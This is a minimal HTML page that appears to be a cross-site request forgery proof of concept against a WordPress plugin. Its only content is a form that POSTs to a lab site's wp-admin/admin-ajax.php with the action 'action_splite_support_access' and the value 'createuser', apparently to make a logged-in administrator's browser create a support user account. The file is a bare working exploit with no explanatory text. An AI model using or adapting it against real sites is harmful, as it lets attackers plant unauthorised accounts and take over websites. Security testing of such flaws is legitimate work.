<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<title> form </title>
	</head>
	<body>
		<form method="POST" action="http://wordpress.lab/wp-admin/admin-ajax.php">
			<input name="action" type="text" value="action_splite_support_access">
			<input name="todo" type="text" value="createuser">
			<input type="submit" value="submit">
		</form>
	</body>
</html>
		
